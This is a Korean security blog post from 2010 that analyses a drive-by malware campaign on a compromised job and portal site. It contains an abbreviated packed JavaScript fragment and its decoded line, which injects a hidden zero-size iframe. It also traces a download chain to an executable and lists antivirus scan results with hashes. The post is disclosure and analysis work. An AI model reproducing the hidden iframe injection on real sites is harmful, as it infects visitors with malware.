posted by Kwan's 2010. 10. 1. 22:18

어제 게시물 : [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다.

전 게시물에 이어서 오늘도 역시 유포가 계속되고 있습니다. 오늘 아침에는 링크가 지워진것을 보았으니 또다시 링크를 삽입하여서 유포중에 있습니다. 빠른 조치가 될 줄 알았지만 지금도 역시 사이트에 접속하면 링크안에 또 다시 악성코드가 자리를 잡고 있음을 확인하였습니다.
왠지 계속 뚫리는거 보니 확인하는게 그때 그때만 하는게 아닌지 생각이 드네요...어제에 쓴 글과 같이 오늘도 역시 실망을 시키지 않는 취업 , 포털사이트 빨리 수정이 되었으면 하네요 . 현재 js 파일 안에는 또 다른 js로 연결되는 아이프레임이 삽입 되어 있습니다.

현재 포털 JS 안에는 아이프레임 형식이아닌 꼬여놓아서 코드를 만들어 놓았습니다

[생략](생략){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){중략};while(c--){if(k[c]){중략}('중략');',[중략]'.split('|'),0,{})) 이런식으로 되어 있습니다.

출력 시키면 : document.write("<iframe src=http://221.xxx.48.xxx/js/si.asp width=0 height=0></iframe>"); 이렇게 나옵니다~

다시 이런것을 출력 한다면 또다시 http://221.xxx.48.xxx/js/si.js 에 접근하게 됩니다. 이역시 위에 코드와 같이 꼬아놓았습니다. 그것을 다시 풀면 비로소 최종 파일에 연결되는 http://221.xxx.48.xxx/js/si.asp 에 접근이 됩니다. 그것을 토대로 최종파일 http://www.roxxxxxx.com/xxxx/help/box.exe 이쪽까지 연결되고 있습니다.
현재 js , asp , 최종파일을 살아있으며 사이트에 접근 하실때 감염이 되어있을수 있음을 알려드립니다 ...최종파일 box.exe 에 사용되었던 링크는 예전에도 많이 최종파일의 유포지였는데 조금 잠잠한가 싶더니만 또 다시 유포경로로 사용되고 있네요... time.asp 시절부터 줄 곧 최종파일로 들어가 있더니 오늘은 다른쪽에서 넣어져있네요..

마지막으로 어제와 달리 오늘은 주소, 최종파일 위치만 바뀌었을뿐 써먹은 기법은 비슷합니다. 

[안철수연구소 진단사항]

si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00)
si.asp ~> V3 : HTML/Exploit-cve(추가 : 2010.08.16.00)
최종파일 : box.exe ~> 악성 

[바이러스 토탈]

File name:

si.js

Result:

10/ 43 (23.3%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script/W32.Agent.KE
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.Exploit.424
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 12:37:05 (UTC)

File name:

si.asp

Result:

19/ 43 (44.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 HTML/Exploit-cve
AntiVir 7.10.12.96 2010.10.01 JS/Agent.AV.2
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 JS:Downloader-RN
Avast5 5.0.594.0 2010.10.01 JS:Downloader-RN
AVG 9.0.0.851 2010.10.01 Script/Exploit
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Exploit.CVE2010.806
Emsisoft 5.0.0.50 2010.10.01 Exploit.JS.CVE-2010-0806!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.10.01 Exploit.JS.CVE-2010-0806
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script-JS/W32.Agent.ADF
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Trojan.Malscript
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Trojan.Malscript!html
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.EX-CVE-2010-0806.6014
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 8c3559a49e01ca01f37f30bb2becb843
SHA1: f5fe8f1f3879eadaefe1e5634caf1edd14c16394
SHA256: 6aa0644aac956e3c29c2de74ffcea74f560409a8eccc6ad5d5ee281631d18581
File size: 6014 bytes
Scan date: 2010-10-01 12:35:51 (UTC)

File name:

box.exe

Result:

16/ 43 (37.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Trojan/Win32.OnlineGameHack
AntiVir 7.10.12.96 2010.10.01 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 -
Avast5 5.0.594.0 2010.10.01 -
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
CAT-QuickHeal 11.00 2010.10.01 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Ikarus T3.1.1.90.0 2010.10.01 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 -
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 Suspicious file
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 -
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.10.01 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -

MD5: 890f91924b1bd1ddc739c2a76cda20d7
SHA1: a11f4048cc73f38b3eed1f2f0f97161ba9d548dd
SHA256: e8f0b94fd3cb4d0772766c8a31021d505991d96fab11f17c2f73c53a21fd28d2
File size: 54272 bytes
Scan date: 2010-10-01 12:37:55 (UTC)

File name:

test.html

Result:

6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 -
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 -
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -
MD5: cf3e589dd00e28a178ead8d8d8ebc5d2
SHA1: e690c7a6395058e7c3a785c470fce0ae2906e9a6
SHA256: 1328284a3d90a852b641ed1fe85ade7251837445b8acf2ae713f0cac224375d9
File size: 442 bytes
Scan date: 2010-10-01 12:45:33 (UTC)

참고로 test.html 은 js 출력시키는 방법을 전수해주신 쭌님에게 감사함을 전해 드립니다 ~

신고 예정 업체 : 네이버 , 이스트 소프트 , 잉카 인터넷 , 퓨쳐 시스템 !! 입니다 !!

끝까지 읽어주셔서 감사하고 앞으로도 많은 관심 부탁드립니다~

댓글을 달아 주세요

  1. 2010.10.02 08:28  Addr  Edit/Del  Reply

    비밀댓글입니다

  2. du hoc han quoc 2012.01.19 17:12  Addr  Edit/Del  Reply

    고마워요, 좋은 하루 소원